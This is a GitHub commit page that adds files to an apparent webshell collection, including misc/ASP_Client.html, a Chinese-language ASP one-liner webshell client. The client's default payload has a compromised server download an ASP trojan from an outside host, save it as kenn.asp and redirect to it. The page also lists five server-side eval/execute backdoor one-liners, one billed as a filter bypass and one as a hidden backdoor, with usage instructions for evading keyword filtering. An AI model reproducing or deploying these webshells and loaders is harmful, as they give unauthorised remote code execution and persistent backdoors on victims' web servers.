Skip to content

Commit e122261

Browse files
committed
fix
1 parent 831acfe commit e122261

File tree

11 files changed

+3136
-0
lines changed

11 files changed

+3136
-0
lines changed

Asp/图片一句话/mima_abcd.jpg

10.3 KB
Loading

Php/图片一句话/bypass_RCE_php.gif

Lines changed: 464 additions & 0 deletions
Loading

misc/ASP_Client.html

Lines changed: 52 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,52 @@
1+
<HTML><HEAD><TITLE>ASP一句话客户端</TITLE>
2+
<META http-equiv=Content-Type content="text/html; charset=gb2312">
3+
<STYLE type=text/css><!--body {
4+
background-color: #000000;
5+
font-size: 12px;
6+
}
7+
.bad {
8+
border: 1px solid #33ff00;
9+
font-size: 12px;
10+
link{COLOR:#33ff00;};A:visited{COLOR:#33ff00;};
11+
}-->
12+
</STYLE>
13+
14+
<META content="MSHTML 6.00.2900.3132" name=GENERATOR></HEAD>
15+
<BODY>
16+
<CENTER>
17+
<DIV
18+
style="FONT-SIZE: 16pt; FILTER: glow(color=#33ff00, strength=6); WIDTH: 350px; COLOR: #33ff00; LINE-HEIGHT: 35pt; FONT-FAMILY: Comic Sans MS; POSITION: relative"><br>ASP一句话客户端远程上传版</DIV>
19+
<TABLE class=bad height=14 cellSpacing=0 width=627 align=center border=1 boodercolor=#33ff00>
20+
<TBODY>
21+
<TR>
22+
<TD width=794 height=1>
23+
<FORM name=pass method=post><FONT color=#33ff00>服务端网址:</FONT><INPUT id=act
24+
size=76 value=http:// name=act> <INPUT onclick=this.form.blfy.name=this.form.password.value;this.form.action=this.form.act.value; type=submit value=GOGOGO>
25+
<BR><FONT color=#33ff00>登陆密码:&nbsp;&nbsp;</font><INPUT id=password size=76 value=blfy name=password> <INPUT id=blfy
26+
type=hidden
27+
value='Execute("Session(""blfy"")=request(""*""):Execute(Session(""blfy""))")'
28+
name=blfy> </TD></TR>
29+
<TR>
30+
<TD width=794 height=100><TEXTAREA name=* rows=5 cols=100 width="45">Set xPost = CreateObject("Microsoft.XMLHTTP")
31+
xPost.Open "GET","http://www.jbl86.com/news.txt",False
32+
xPost.Send()
33+
Set sGet = CreateObject("ADODB.Stream")
34+
sGet.Mode = 3
35+
sGet.Type = 1
36+
sGet.Open()
37+
sGet.Write(xPost.responseBody)
38+
sGet.SaveToFile Server.MapPath("kenn.asp"),2
39+
set sGet = nothing
40+
set sPOST = nothing
41+
response.redirect "kenn.asp"</TEXTAREA> </TD></TR>
42+
<TR>
43+
<TD width=794 height=7><font color=#33ff00>把红色的<FONT color=red>&nbsp;blfy&nbsp;</FONT>换成您的密码!&nbsp;&nbsp;&nbsp;&nbsp;提供五个服务端: <BR>1.
44+
&lt;%eval request("<FONT color=red>blfy</FONT>")%&gt; <BR>2. &lt;%execute
45+
request("<FONT color=red>blfy</FONT>")%&gt; <BR>3.
46+
&lt;%execute(request("<FONT color=red>blfy</FONT>"))%&gt; <BR>
47+
4、&lt;script language=VBScript runat=server&gt;execute request("<FONT color=red>blfy</FONT>")&lt;/Script&gt;&nbsp;&nbsp;突破&lt;%%&gt;过滤版<br>
48+
5、&lt;%If request("5") ="5" then eval request("<FONT color=red>blfy</FONT>") end if %&gt;&nbsp;&nbsp;隐蔽后门版,访问格式为: help.asp?5=5<br></font>
49+
</TD></TR></TBODY></TABLE>
50+
</FORM></CENTER><font color="#33ff00">
51+
<center>本程序可以调用XMLHTTP控件让服务器从网上下载ASP木马并保存在服务器上!<br>
52+
&nbsp;可以突破服务器的关键词过滤而导制的我们的大马无法正常提交的障碍!&nbsp;<br><br>使用方法:&nbsp;先把自己的ASP大马上传的自己的空间里.只能是TXT格式.<br>再把&nbsp;http://www.jbl86.com/news.txt&nbsp;改成你的网马地址.如&nbsp;http://www.921506.cn/muma.txt&nbsp;&nbsp;&nbsp;&nbsp;<br> 再把两个&nbsp;kenn.asp&nbsp;都改成你要保存的木马的文件名.如:&nbsp;muma.asp&nbsp;默认地址可以不改:&nbsp;kenn.asp<br><br>程序设计:&nbsp;Kenn&nbsp;&nbsp;&nbsp;&nbsp;QQ:921506&nbsp;&nbsp;&nbsp;&nbsp;Blog:&nbsp;<a href=http://www.cnblogs.com/kenn0626>myBlog</a></center></font></BODY></HTML>

misc/Asp_Aspx_Php_V1.jpg

6.74 KB
Loading

misc/Asp_Aspx_Php_V2.jpg

7.11 KB
Loading

0 commit comments

Comments
 (0)